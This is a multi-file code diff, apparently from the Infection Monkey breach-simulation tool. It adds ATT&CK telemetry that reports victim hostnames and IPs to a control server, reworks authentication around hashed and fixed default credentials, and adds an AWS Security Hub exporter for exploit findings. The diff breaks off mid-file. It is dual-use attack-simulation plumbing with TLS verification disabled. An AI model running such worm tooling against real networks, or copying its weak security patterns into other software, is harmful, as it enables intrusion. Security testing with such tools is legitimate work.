||||||
impacket
|
impacket
|
||||||
PyCrypto
|
pycryptodome
|
||||||
pyasn1
|
pyasn1
|
||||||
cffi
|
cffi
|
||||||
twisted
|
twisted
|
||||||
|
@ -14,4 +14,7 @@ six
|
||||||
ecdsa
|
ecdsa
|
||||||
netifaces
|
netifaces
|
||||||
ipaddress
|
ipaddress
|
||||||
wmi
|
wmi
|
||||||
|
pymssql
|
||||||
|
pyftpdlib
|
||||||
|
enum34
|
|
@ -0,0 +1,21 @@
|
||||||
|
enum34
|
||||||
|
impacket
|
||||||
|
pycryptodome
|
||||||
|
pyasn1
|
||||||
|
cffi
|
||||||
|
twisted
|
||||||
|
rdpy
|
||||||
|
requests
|
||||||
|
odict
|
||||||
|
paramiko
|
||||||
|
psutil==3.4.2
|
||||||
|
PyInstaller
|
||||||
|
six
|
||||||
|
ecdsa
|
||||||
|
netifaces
|
||||||
|
ipaddress
|
||||||
|
wmi
|
||||||
|
pywin32
|
||||||
|
pymssql
|
||||||
|
pyftpdlib
|
||||||
|
enum34
|
|
@ -1,6 +1,6 @@
|
||||||
import logging
|
import logging
|
||||||
|
|
||||||
from common.cloud.aws import AWS
|
from common.cloud.aws_instance import AwsInstance
|
||||||
|
|
||||||
__author__ = 'itay.mizeretz'
|
__author__ = 'itay.mizeretz'
|
||||||
|
|
||||||
|
@ -15,7 +15,7 @@ class AwsCollector(object):
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def get_aws_info():
|
def get_aws_info():
|
||||||
LOG.info("Collecting AWS info")
|
LOG.info("Collecting AWS info")
|
||||||
aws = AWS()
|
aws = AwsInstance()
|
||||||
info = {}
|
info = {}
|
||||||
if aws.is_aws_instance():
|
if aws.is_aws_instance():
|
||||||
LOG.info("Machine is an AWS instance")
|
LOG.info("Machine is an AWS instance")
|
||||||
|
|
|
@ -36,7 +36,7 @@ class WindowsInfoCollector(InfoCollector):
|
||||||
"""
|
"""
|
||||||
LOG.debug("Running Windows collector")
|
LOG.debug("Running Windows collector")
|
||||||
super(WindowsInfoCollector, self).get_info()
|
super(WindowsInfoCollector, self).get_info()
|
||||||
self.get_wmi_info()
|
#self.get_wmi_info()
|
||||||
self.get_installed_packages()
|
self.get_installed_packages()
|
||||||
from infection_monkey.config import WormConfiguration
|
from infection_monkey.config import WormConfiguration
|
||||||
if WormConfiguration.should_use_mimikatz:
|
if WormConfiguration.should_use_mimikatz:
|
||||||
|
|
|
@ -0,0 +1 @@
|
||||||
|
__author__ = 'VakarisZ'
|
|
@ -0,0 +1,41 @@
|
||||||
|
from infection_monkey.config import WormConfiguration, GUID
|
||||||
|
import requests
|
||||||
|
import json
|
||||||
|
from infection_monkey.control import ControlClient
|
||||||
|
import logging
|
||||||
|
|
||||||
|
__author__ = "VakarisZ"
|
||||||
|
|
||||||
|
LOG = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
|
class AttackTelem(object):
|
||||||
|
|
||||||
|
def __init__(self, technique, status, data=None):
|
||||||
|
"""
|
||||||
|
Default ATT&CK telemetry constructor
|
||||||
|
:param technique: Technique ID. E.g. T111
|
||||||
|
:param status: int from ScanStatus Enum
|
||||||
|
:param data: Other data relevant to the attack technique
|
||||||
|
"""
|
||||||
|
self.technique = technique
|
||||||
|
self.result = status
|
||||||
|
self.data = {'status': status, 'id': GUID}
|
||||||
|
if data:
|
||||||
|
self.data.update(data)
|
||||||
|
|
||||||
|
def send(self):
|
||||||
|
"""
|
||||||
|
Sends telemetry to island
|
||||||
|
"""
|
||||||
|
if not WormConfiguration.current_server:
|
||||||
|
return
|
||||||
|
try:
|
||||||
|
requests.post("https://%s/api/attack/%s" % (WormConfiguration.current_server, self.technique),
|
||||||
|
data=json.dumps(self.data),
|
||||||
|
headers={'content-type': 'application/json'},
|
||||||
|
verify=False,
|
||||||
|
proxies=ControlClient.proxies)
|
||||||
|
except Exception as exc:
|
||||||
|
LOG.warn("Error connecting to control server %s: %s",
|
||||||
|
WormConfiguration.current_server, exc)
|
|
@ -0,0 +1,18 @@
|
||||||
|
from infection_monkey.transport.attack_telems.base_telem import AttackTelem
|
||||||
|
|
||||||
|
__author__ = "VakarisZ"
|
||||||
|
|
||||||
|
|
||||||
|
class VictimHostTelem(AttackTelem):
|
||||||
|
|
||||||
|
def __init__(self, technique, status, machine, data=None):
|
||||||
|
"""
|
||||||
|
ATT&CK telemetry that parses and sends VictimHost's (remote machine's) data
|
||||||
|
:param technique: Technique ID. E.g. T111
|
||||||
|
:param status: int from ScanStatus Enum
|
||||||
|
:param machine: VictimHost obj from model/host.py
|
||||||
|
:param data: Other data relevant to the attack technique
|
||||||
|
"""
|
||||||
|
super(VictimHostTelem, self).__init__(technique, status, data)
|
||||||
|
victim_host = {'hostname': machine.domain_name, 'ip': machine.ip_addr}
|
||||||
|
self.data.update({'machine': victim_host})
|
|
@ -1,5 +1,6 @@
|
||||||
import os
|
import os
|
||||||
import sys
|
import sys
|
||||||
|
import shutil
|
||||||
import struct
|
import struct
|
||||||
|
|
||||||
from infection_monkey.config import WormConfiguration
|
from infection_monkey.config import WormConfiguration
|
||||||
|
@ -35,3 +36,25 @@ def utf_to_ascii(string):
|
||||||
# Converts utf string to ascii. Safe to use even if string is already ascii.
|
# Converts utf string to ascii. Safe to use even if string is already ascii.
|
||||||
udata = string.decode("utf-8")
|
udata = string.decode("utf-8")
|
||||||
return udata.encode("ascii", "ignore")
|
return udata.encode("ascii", "ignore")
|
||||||
|
|
||||||
|
|
||||||
|
def create_monkey_dir():
|
||||||
|
"""
|
||||||
|
Creates directory for monkey and related files
|
||||||
|
"""
|
||||||
|
if not os.path.exists(get_monkey_dir_path()):
|
||||||
|
os.mkdir(get_monkey_dir_path())
|
||||||
|
|
||||||
|
|
||||||
|
def remove_monkey_dir():
|
||||||
|
"""
|
||||||
|
Removes monkey's root directory
|
||||||
|
"""
|
||||||
|
shutil.rmtree(get_monkey_dir_path(), ignore_errors=True)
|
||||||
|
|
||||||
|
|
||||||
|
def get_monkey_dir_path():
|
||||||
|
if is_windows_os():
|
||||||
|
return WormConfiguration.monkey_dir_windows
|
||||||
|
else:
|
||||||
|
return WormConfiguration.monkey_dir_linux
|
||||||
|
|
|
@ -18,14 +18,19 @@ from cc.resources.log import Log
|
||||||
from cc.resources.island_logs import IslandLog
|
from cc.resources.island_logs import IslandLog
|
||||||
from cc.resources.monkey import Monkey
|
from cc.resources.monkey import Monkey
|
||||||
from cc.resources.monkey_configuration import MonkeyConfiguration
|
from cc.resources.monkey_configuration import MonkeyConfiguration
|
||||||
|
from cc.resources.island_configuration import IslandConfiguration
|
||||||
from cc.resources.monkey_download import MonkeyDownload
|
from cc.resources.monkey_download import MonkeyDownload
|
||||||
from cc.resources.netmap import NetMap
|
from cc.resources.netmap import NetMap
|
||||||
from cc.resources.node import Node
|
from cc.resources.node import Node
|
||||||
|
from cc.resources.remote_run import RemoteRun
|
||||||
from cc.resources.report import Report
|
from cc.resources.report import Report
|
||||||
from cc.resources.root import Root
|
from cc.resources.root import Root
|
||||||
from cc.resources.telemetry import Telemetry
|
from cc.resources.telemetry import Telemetry
|
||||||
from cc.resources.telemetry_feed import TelemetryFeed
|
from cc.resources.telemetry_feed import TelemetryFeed
|
||||||
|
from cc.resources.pba_file_download import PBAFileDownload
|
||||||
from cc.services.config import ConfigService
|
from cc.services.config import ConfigService
|
||||||
|
from cc.resources.pba_file_upload import FileUpload
|
||||||
|
from cc.resources.attack_telem import AttackTelem
|
||||||
|
|
||||||
__author__ = 'Barak'
|
__author__ = 'Barak'
|
||||||
|
|
||||||
|
@ -104,6 +109,7 @@ def init_app(mongo_url):
|
||||||
api.add_resource(ClientRun, '/api/client-monkey', '/api/client-monkey/')
|
api.add_resource(ClientRun, '/api/client-monkey', '/api/client-monkey/')
|
||||||
api.add_resource(Telemetry, '/api/telemetry', '/api/telemetry/', '/api/telemetry/<string:monkey_guid>')
|
api.add_resource(Telemetry, '/api/telemetry', '/api/telemetry/', '/api/telemetry/<string:monkey_guid>')
|
||||||
api.add_resource(MonkeyConfiguration, '/api/configuration', '/api/configuration/')
|
api.add_resource(MonkeyConfiguration, '/api/configuration', '/api/configuration/')
|
||||||
|
api.add_resource(IslandConfiguration, '/api/configuration/island', '/api/configuration/island/')
|
||||||
api.add_resource(MonkeyDownload, '/api/monkey/download', '/api/monkey/download/',
|
api.add_resource(MonkeyDownload, '/api/monkey/download', '/api/monkey/download/',
|
||||||
'/api/monkey/download/<string:path>')
|
'/api/monkey/download/<string:path>')
|
||||||
api.add_resource(NetMap, '/api/netmap', '/api/netmap/')
|
api.add_resource(NetMap, '/api/netmap', '/api/netmap/')
|
||||||
|
@ -113,5 +119,11 @@ def init_app(mongo_url):
|
||||||
api.add_resource(TelemetryFeed, '/api/telemetry-feed', '/api/telemetry-feed/')
|
api.add_resource(TelemetryFeed, '/api/telemetry-feed', '/api/telemetry-feed/')
|
||||||
api.add_resource(Log, '/api/log', '/api/log/')
|
api.add_resource(Log, '/api/log', '/api/log/')
|
||||||
api.add_resource(IslandLog, '/api/log/island/download', '/api/log/island/download/')
|
api.add_resource(IslandLog, '/api/log/island/download', '/api/log/island/download/')
|
||||||
|
api.add_resource(PBAFileDownload, '/api/pba/download/<string:path>')
|
||||||
|
api.add_resource(FileUpload, '/api/fileUpload/<string:file_type>',
|
||||||
|
'/api/fileUpload/<string:file_type>?load=<string:filename>',
|
||||||
|
'/api/fileUpload/<string:file_type>?restore=<string:filename>')
|
||||||
|
api.add_resource(RemoteRun, '/api/remote-monkey', '/api/remote-monkey/')
|
||||||
|
api.add_resource(AttackTelem, '/api/attack/<string:technique>')
|
||||||
|
|
||||||
return app
|
return app
|
||||||
|
|
|
@ -33,20 +33,18 @@ def init_jwt(app):
|
||||||
user_id = payload['identity']
|
user_id = payload['identity']
|
||||||
return userid_table.get(user_id, None)
|
return userid_table.get(user_id, None)
|
||||||
|
|
||||||
if env.is_auth_enabled():
|
JWT(app, authenticate, identity)
|
||||||
JWT(app, authenticate, identity)
|
|
||||||
|
|
||||||
|
|
||||||
def jwt_required(realm=None):
|
def jwt_required(realm=None):
|
||||||
def wrapper(fn):
|
def wrapper(fn):
|
||||||
@wraps(fn)
|
@wraps(fn)
|
||||||
def decorator(*args, **kwargs):
|
def decorator(*args, **kwargs):
|
||||||
if env.is_auth_enabled():
|
try:
|
||||||
try:
|
_jwt_required(realm or current_app.config['JWT_DEFAULT_REALM'])
|
||||||
_jwt_required(realm or current_app.config['JWT_DEFAULT_REALM'])
|
return fn(*args, **kwargs)
|
||||||
except JWTError:
|
except JWTError:
|
||||||
abort(401)
|
abort(401)
|
||||||
return fn(*args, **kwargs)
|
|
||||||
|
|
||||||
return decorator
|
return decorator
|
||||||
|
|
||||||
|
|
|
@ -39,7 +39,7 @@ class Encryptor:
|
||||||
def enc(self, message):
|
def enc(self, message):
|
||||||
cipher_iv = Random.new().read(AES.block_size)
|
cipher_iv = Random.new().read(AES.block_size)
|
||||||
cipher = AES.new(self._cipher_key, AES.MODE_CBC, cipher_iv)
|
cipher = AES.new(self._cipher_key, AES.MODE_CBC, cipher_iv)
|
||||||
return base64.b64encode(cipher_iv + cipher.encrypt(self._pad(message)))
|
return base64.b64encode(cipher_iv + cipher.encrypt(str(self._pad(message)))) # ciper.encrypt expects str
|
||||||
|
|
||||||
def dec(self, enc_message):
|
def dec(self, enc_message):
|
||||||
enc_message = base64.b64decode(enc_message)
|
enc_message = base64.b64decode(enc_message)
|
||||||
|
|
|
@ -1,6 +1,7 @@
|
||||||
import abc
|
import abc
|
||||||
from datetime import timedelta
|
from datetime import timedelta
|
||||||
import os
|
import os
|
||||||
|
from Crypto.Hash import SHA3_512
|
||||||
|
|
||||||
__author__ = 'itay.mizeretz'
|
__author__ = 'itay.mizeretz'
|
||||||
|
|
||||||
|
@ -13,6 +14,12 @@ class Environment(object):
|
||||||
_DEBUG_SERVER = False
|
_DEBUG_SERVER = False
|
||||||
_AUTH_EXPIRATION_TIME = timedelta(hours=1)
|
_AUTH_EXPIRATION_TIME = timedelta(hours=1)
|
||||||
|
|
||||||
|
def __init__(self):
|
||||||
|
self.config = None
|
||||||
|
|
||||||
|
def set_config(self, config):
|
||||||
|
self.config = config
|
||||||
|
|
||||||
def get_island_port(self):
|
def get_island_port(self):
|
||||||
return self._ISLAND_PORT
|
return self._ISLAND_PORT
|
||||||
|
|
||||||
|
@ -25,9 +32,10 @@ class Environment(object):
|
||||||
def get_auth_expiration_time(self):
|
def get_auth_expiration_time(self):
|
||||||
return self._AUTH_EXPIRATION_TIME
|
return self._AUTH_EXPIRATION_TIME
|
||||||
|
|
||||||
@abc.abstractmethod
|
def hash_secret(self, secret):
|
||||||
def is_auth_enabled(self):
|
h = SHA3_512.new()
|
||||||
return
|
h.update(secret)
|
||||||
|
return h.hexdigest()
|
||||||
|
|
||||||
@abc.abstractmethod
|
@abc.abstractmethod
|
||||||
def get_auth_users(self):
|
def get_auth_users(self):
|
||||||
|
|
|
@ -1,6 +1,7 @@
|
||||||
import cc.auth
|
import cc.auth
|
||||||
from cc.environment import Environment
|
from cc.environment import Environment
|
||||||
from common.cloud.aws import AWS
|
from common.cloud.aws_instance import AwsInstance
|
||||||
|
from Crypto.Hash import SHA3_512
|
||||||
|
|
||||||
__author__ = 'itay.mizeretz'
|
__author__ = 'itay.mizeretz'
|
||||||
|
|
||||||
|
@ -8,16 +9,17 @@ __author__ = 'itay.mizeretz'
|
||||||
class AwsEnvironment(Environment):
|
class AwsEnvironment(Environment):
|
||||||
def __init__(self):
|
def __init__(self):
|
||||||
super(AwsEnvironment, self).__init__()
|
super(AwsEnvironment, self).__init__()
|
||||||
self._instance_id = AwsEnvironment._get_instance_id()
|
self.aws_info = AwsInstance()
|
||||||
|
self._instance_id = self._get_instance_id()
|
||||||
|
self.region = self._get_region()
|
||||||
|
|
||||||
@staticmethod
|
def _get_instance_id(self):
|
||||||
def _get_instance_id():
|
return self.aws_info.get_instance_id()
|
||||||
return AWS.get_instance_id()
|
|
||||||
|
|
||||||
def is_auth_enabled(self):
|
def _get_region(self):
|
||||||
return True
|
return self.aws_info.get_region()
|
||||||
|
|
||||||
def get_auth_users(self):
|
def get_auth_users(self):
|
||||||
return [
|
return [
|
||||||
cc.auth.User(1, 'monkey', self._instance_id)
|
cc.auth.User(1, 'monkey', self.hash_secret(self._instance_id))
|
||||||
]
|
]
|
||||||
|
|
|
@ -1,27 +1,40 @@
|
||||||
import json
|
import json
|
||||||
import logging
|
import logging
|
||||||
import standard
|
|
||||||
import aws
|
from cc.environment import standard
|
||||||
|
from cc.environment import aws
|
||||||
|
from cc.environment import password
|
||||||
|
|
||||||
|
__author__ = 'itay.mizeretz'
|
||||||
|
|
||||||
logger = logging.getLogger(__name__)
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
AWS = 'aws'
|
||||||
|
STANDARD = 'standard'
|
||||||
|
PASSWORD = 'password'
|
||||||
|
|
||||||
ENV_DICT = {
|
ENV_DICT = {
|
||||||
'standard': standard.StandardEnvironment,
|
STANDARD: standard.StandardEnvironment,
|
||||||
'aws': aws.AwsEnvironment
|
AWS: aws.AwsEnvironment,
|
||||||
|
PASSWORD: password.PasswordEnvironment,
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
||||||
def load_env_from_file():
|
def load_server_configuration_from_file():
|
||||||
with open('monkey_island/cc/server_config.json', 'r') as f:
|
with open('monkey_island/cc/server_config.json', 'r') as f:
|
||||||
config_content = f.read()
|
config_content = f.read()
|
||||||
config_json = json.loads(config_content)
|
return json.loads(config_content)
|
||||||
|
|
||||||
|
|
||||||
|
def load_env_from_file():
|
||||||
|
config_json = load_server_configuration_from_file()
|
||||||
return config_json['server_config']
|
return config_json['server_config']
|
||||||
|
|
||||||
|
|
||||||
try:
|
try:
|
||||||
__env_type = load_env_from_file()
|
config_json = load_server_configuration_from_file()
|
||||||
|
__env_type = config_json['server_config']
|
||||||
env = ENV_DICT[__env_type]()
|
env = ENV_DICT[__env_type]()
|
||||||
|
env.set_config(config_json)
|
||||||
logger.info('Monkey\'s env is: {0}'.format(env.__class__.__name__))
|
logger.info('Monkey\'s env is: {0}'.format(env.__class__.__name__))
|
||||||
except Exception:
|
except Exception:
|
||||||
logger.error('Failed initializing environment', exc_info=True)
|
logger.error('Failed initializing environment', exc_info=True)
|
||||||
|
|
|
@ -0,0 +1,12 @@
|
||||||
|
from cc.environment import Environment
|
||||||
|
import cc.auth
|
||||||
|
|
||||||
|
__author__ = 'itay.mizeretz'
|
||||||
|
|
||||||
|
|
||||||
|
class PasswordEnvironment(Environment):
|
||||||
|
|
||||||
|
def get_auth_users(self):
|
||||||
|
return [
|
||||||
|
cc.auth.User(1, self.config['user'], self.config['hash'])
|
||||||
|
]
|
|
@ -1,12 +1,15 @@
|
||||||
|
import cc.auth
|
||||||
from cc.environment import Environment
|
from cc.environment import Environment
|
||||||
|
|
||||||
__author__ = 'itay.mizeretz'
|
__author__ = 'itay.mizeretz'
|
||||||
|
|
||||||
|
|
||||||
class StandardEnvironment(Environment):
|
class StandardEnvironment(Environment):
|
||||||
|
# SHA3-512 of '1234567890!@#$%^&*()_nothing_up_my_sleeve_1234567890!@#$%^&*()'
|
||||||
def is_auth_enabled(self):
|
NO_AUTH_CREDS = '55e97c9dcfd22b8079189ddaeea9bce8125887e3237b800c6176c9afa80d2062' \
|
||||||
return False
|
'8d2c8d0b1538d2208c1444ac66535b764a3d902b35e751df3faec1e477ed3557'
|
||||||
|
|
||||||
def get_auth_users(self):
|
def get_auth_users(self):
|
||||||
return []
|
return [
|
||||||
|
cc.auth.User(1, StandardEnvironment.NO_AUTH_CREDS, StandardEnvironment.NO_AUTH_CREDS)
|
||||||
|
]
|
||||||
|
|
|
@ -0,0 +1,19 @@
|
||||||
|
from cc.environment.environment import load_env_from_file, AWS
|
||||||
|
from cc.report_exporter_manager import ReportExporterManager
|
||||||
|
from cc.resources.aws_exporter import AWSExporter
|
||||||
|
|
||||||
|
__author__ = 'maor.rayzin'
|
||||||
|
|
||||||
|
|
||||||
|
def populate_exporter_list():
|
||||||
|
|
||||||
|
manager = ReportExporterManager()
|
||||||
|
if is_aws_exporter_required():
|
||||||
|
manager.add_exporter_to_list(AWSExporter)
|
||||||
|
|
||||||
|
|
||||||
|
def is_aws_exporter_required():
|
||||||
|
if str(load_env_from_file()) == AWS:
|
||||||
|
return True
|
||||||
|
else:
|
||||||
|
return False
|
|
@ -18,6 +18,7 @@ json_setup_logging(default_path=os.path.join(BASE_PATH, 'cc', 'island_logger_def
|
||||||
logger = logging.getLogger(__name__)
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
from cc.app import init_app
|
from cc.app import init_app
|
||||||
|
from cc.exporter_init import populate_exporter_list
|
||||||
from cc.utils import local_ip_addresses
|
from cc.utils import local_ip_addresses
|
||||||
from cc.environment.environment import env
|
from cc.environment.environment import env
|
||||||
from cc.database import is_db_server_up
|
from cc.database import is_db_server_up
|
||||||
|
@ -34,6 +35,7 @@ def main():
|
||||||
logger.info('Waiting for MongoDB server')
|
logger.info('Waiting for MongoDB server')
|
||||||
time.sleep(1)
|
time.sleep(1)
|
||||||
|
|
||||||
|
populate_exporter_list()
|
||||||
app = init_app(mongo_url)
|
app = init_app(mongo_url)
|
||||||
if env.is_debug():
|
if env.is_debug():
|
||||||
app.run(host='0.0.0.0', debug=True, ssl_context=('monkey_island/cc/server.crt', 'monkey_island/cc/server.key'))
|
app.run(host='0.0.0.0', debug=True, ssl_context=('monkey_island/cc/server.crt', 'monkey_island/cc/server.key'))
|
||||||
|
@ -44,6 +46,7 @@ def main():
|
||||||
http_server.listen(env.get_island_port())
|
http_server.listen(env.get_island_port())
|
||||||
logger.info(
|
logger.info(
|
||||||
'Monkey Island Server is running on https://{}:{}'.format(local_ip_addresses()[0], env.get_island_port()))
|
'Monkey Island Server is running on https://{}:{}'.format(local_ip_addresses()[0], env.get_island_port()))
|
||||||
|
|
||||||
IOLoop.instance().start()
|
IOLoop.instance().start()
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,34 @@
|
||||||
|
import logging
|
||||||
|
|
||||||
|
__author__ = 'maor.rayzin'
|
||||||
|
|
||||||
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
|
class Singleton(type):
|
||||||
|
_instances = {}
|
||||||
|
|
||||||
|
def __call__(cls, *args, **kwargs):
|
||||||
|
if cls not in cls._instances:
|
||||||
|
cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs)
|
||||||
|
return cls._instances[cls]
|
||||||
|
|
||||||
|
|
||||||
|
class ReportExporterManager(object):
|
||||||
|
__metaclass__ = Singleton
|
||||||
|
|
||||||
|
def __init__(self):
|
||||||
|
self._exporters_set = set()
|
||||||
|
|
||||||
|
def get_exporters_list(self):
|
||||||
|
return self._exporters_set
|
||||||
|
|
||||||
|
def add_exporter_to_list(self, exporter):
|
||||||
|
self._exporters_set.add(exporter)
|
||||||
|
|
||||||
|
def export(self, report):
|
||||||
|
try:
|
||||||
|
for exporter in self._exporters_set:
|
||||||
|
exporter().handle_report(report)
|
||||||
|
except Exception as e:
|
||||||
|
logger.exception('Failed to export report')
|
|
@ -0,0 +1,24 @@
|
||||||
|
import flask_restful
|
||||||
|
from flask import request
|
||||||
|
import json
|
||||||
|
from cc.services.attack.attack_telem import set_results
|
||||||
|
import logging
|
||||||
|
|
||||||
|
__author__ = 'VakarisZ'
|
||||||
|
|
||||||
|
LOG = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
|
class AttackTelem(flask_restful.Resource):
|
||||||
|
"""
|
||||||
|
ATT&CK endpoint used to retrieve matrix related info from monkey
|
||||||
|
"""
|
||||||
|
|
||||||
|
def post(self, technique):
|
||||||
|
"""
|
||||||
|
Gets ATT&CK telemetry data and stores it in the database
|
||||||
|
:param technique: Technique ID, e.g. T1111
|
||||||
|
"""
|
||||||
|
data = json.loads(request.data)
|
||||||
|
set_results(technique, data)
|
||||||
|
return {}
|
|
@ -0,0 +1,411 @@
|
||||||
|
import logging
|
||||||
|
import uuid
|
||||||
|
from datetime import datetime
|
||||||
|
import boto3
|
||||||
|
from botocore.exceptions import UnknownServiceError
|
||||||
|
|
||||||
|
from cc.resources.exporter import Exporter
|
||||||
|
from cc.services.config import ConfigService
|
||||||
|
from cc.environment.environment import load_server_configuration_from_file
|
||||||
|
from common.cloud.aws_instance import AwsInstance
|
||||||
|
|
||||||
|
__author__ = 'maor.rayzin'
|
||||||
|
|
||||||
|
|
||||||
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
AWS_CRED_CONFIG_KEYS = [['cnc', 'aws_config', 'aws_access_key_id'],
|
||||||
|
['cnc', 'aws_config', 'aws_secret_access_key'],
|
||||||
|
['cnc', 'aws_config', 'aws_account_id']]
|
||||||
|
|
||||||
|
|
||||||
|
class AWSExporter(Exporter):
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def handle_report(report_json):
|
||||||
|
aws = AwsInstance()
|
||||||
|
findings_list = []
|
||||||
|
issues_list = report_json['recommendations']['issues']
|
||||||
|
if not issues_list:
|
||||||
|
logger.info('No issues were found by the monkey, no need to send anything')
|
||||||
|
return True
|
||||||
|
for machine in issues_list:
|
||||||
|
for issue in issues_list[machine]:
|
||||||
|
if issue.get('aws_instance_id', None):
|
||||||
|
findings_list.append(AWSExporter._prepare_finding(issue, aws.get_region()))
|
||||||
|
|
||||||
|
if not AWSExporter._send_findings(findings_list, AWSExporter._get_aws_keys(), aws.get_region()):
|
||||||
|
logger.error('Exporting findings to aws failed')
|
||||||
|
return False
|
||||||
|
|
||||||
|
return True
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def _get_aws_keys():
|
||||||
|
creds_dict = {}
|
||||||
|
for key in AWS_CRED_CONFIG_KEYS:
|
||||||
|
creds_dict[key[2]] = str(ConfigService.get_config_value(key))
|
||||||
|
|
||||||
|
return creds_dict
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def merge_two_dicts(x, y):
|
||||||
|
z = x.copy() # start with x's keys and values
|
||||||
|
z.update(y) # modifies z with y's keys and values & returns None
|
||||||
|
return z
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def _prepare_finding(issue, region):
|
||||||
|
findings_dict = {
|
||||||
|
'island_cross_segment': AWSExporter._handle_island_cross_segment_issue,
|
||||||
|
'ssh': AWSExporter._handle_ssh_issue,
|
||||||
|
'shellshock': AWSExporter._handle_shellshock_issue,
|
||||||
|
'tunnel': AWSExporter._handle_tunnel_issue,
|
||||||
|
'elastic': AWSExporter._handle_elastic_issue,
|
||||||
|
'smb_password': AWSExporter._handle_smb_password_issue,
|
||||||
|
'smb_pth': AWSExporter._handle_smb_pth_issue,
|
||||||
|
'sambacry': AWSExporter._handle_sambacry_issue,
|
||||||
|
'shared_passwords': AWSExporter._handle_shared_passwords_issue,
|
||||||
|
'wmi_password': AWSExporter._handle_wmi_password_issue,
|
||||||
|
'wmi_pth': AWSExporter._handle_wmi_pth_issue,
|
||||||
|
'ssh_key': AWSExporter._handle_ssh_key_issue,
|
||||||
|
'rdp': AWSExporter._handle_rdp_issue,
|
||||||
|
'shared_passwords_domain': AWSExporter._handle_shared_passwords_domain_issue,
|
||||||
|
'shared_admins_domain': AWSExporter._handle_shared_admins_domain_issue,
|
||||||
|
'strong_users_on_crit': AWSExporter._handle_strong_users_on_crit_issue,
|
||||||
|
'struts2': AWSExporter._handle_struts2_issue,
|
||||||
|
'weblogic': AWSExporter._handle_weblogic_issue,
|
||||||
|
'hadoop': AWSExporter._handle_hadoop_issue,
|
||||||
|
# azure and conficker are not relevant issues for an AWS env
|
||||||
|
}
|
||||||
|
|
||||||
|
configured_product_arn = load_server_configuration_from_file()['aws'].get('sec_hub_product_arn', '')
|
||||||
|
product_arn = 'arn:aws:securityhub:{region}:{arn}'.format(region=region, arn=configured_product_arn)
|
||||||
|
instance_arn = 'arn:aws:ec2:' + str(region) + ':instance:{instance_id}'
|
||||||
|
account_id = AWSExporter._get_aws_keys().get('aws_account_id', '')
|
||||||
|
|
||||||
|
finding = {
|
||||||
|
"SchemaVersion": "2018-10-08",
|
||||||
|
"Id": uuid.uuid4().hex,
|
||||||
|
"ProductArn": product_arn,
|
||||||
|
"GeneratorId": issue['type'],
|
||||||
|
"AwsAccountId": account_id,
|
||||||
|
"RecordState": "ACTIVE",
|
||||||
|
"Types": [
|
||||||
|
"Software and Configuration Checks/Vulnerabilities/CVE"
|
||||||
|
],
|
||||||
|
"CreatedAt": datetime.now().isoformat() + 'Z',
|
||||||
|
"UpdatedAt": datetime.now().isoformat() + 'Z',
|
||||||
|
}
|
||||||
|
return AWSExporter.merge_two_dicts(finding, findings_dict[issue['type']](issue, instance_arn))
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def _send_findings(findings_list, creds_dict, region):
|
||||||
|
try:
|
||||||
|
if not creds_dict:
|
||||||
|
logger.info('No AWS access credentials received in configuration')
|
||||||
|
return False
|
||||||
|
|
||||||
|
securityhub = boto3.client('securityhub',
|
||||||
|
aws_access_key_id=creds_dict.get('aws_access_key_id', ''),
|
||||||
|
aws_secret_access_key=creds_dict.get('aws_secret_access_key', ''),
|
||||||
|
region_name=region)
|
||||||
|
|
||||||
|
import_response = securityhub.batch_import_findings(Findings=findings_list)
|
||||||
|
if import_response['ResponseMetadata']['HTTPStatusCode'] == 200:
|
||||||
|
return True
|
||||||
|
else:
|
||||||
|
return False
|
||||||
|
except UnknownServiceError as e:
|
||||||
|
logger.warning('AWS exporter called but AWS-CLI securityhub service is not installed')
|
||||||
|
return False
|
||||||
|
except Exception as e:
|
||||||
|
logger.exception('AWS security hub findings failed to send.')
|
||||||
|
return False
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def _get_finding_resource(instance_id, instance_arn):
|
||||||
|
if instance_id:
|
||||||
|
return [{
|
||||||
|
"Type": "AwsEc2Instance",
|
||||||
|
"Id": instance_arn.format(instance_id=instance_id)
|
||||||
|
}]
|
||||||
|
else:
|
||||||
|
return [{'Type': 'Other', 'Id': 'None'}]
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def _build_generic_finding(severity, title, description, recommendation, instance_arn, instance_id=None):
|
||||||
|
finding = {
|
||||||
|
"Severity": {
|
||||||
|
"Product": severity,
|
||||||
|
"Normalized": 100
|
||||||
|
},
|
||||||
|
'Resources': AWSExporter._get_finding_resource(instance_id, instance_arn),
|
||||||
|
"Title": title,
|
||||||
|
"Description": description,
|
||||||
|
"Remediation": {
|
||||||
|
"Recommendation": {
|
||||||
|
"Text": recommendation
|
||||||
|
}
|
||||||
|
}}
|
||||||
|
|
||||||
|
return finding
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def _handle_tunnel_issue(issue, instance_arn):
|
||||||
|
|
||||||
|
return AWSExporter._build_generic_finding(
|
||||||
|
severity=5,
|
||||||
|
title="Weak segmentation - Machines were able to communicate over unused ports.",
|
||||||
|
description="Use micro-segmentation policies to disable communication other than the required.",
|
||||||
|
recommendation="Machines are not locked down at port level. Network tunnel was set up from {0} to {1}"
|
||||||
|
.format(issue['machine'], issue['dest']),
|
||||||
|
instance_arn=instance_arn,
|
||||||
|
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
|
||||||
|
)
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def _handle_sambacry_issue(issue, instance_arn):
|
||||||
|
|
||||||
|
return AWSExporter._build_generic_finding(
|
||||||
|
severity=10,
|
||||||
|
title="Samba servers are vulnerable to 'SambaCry'",
|
||||||
|
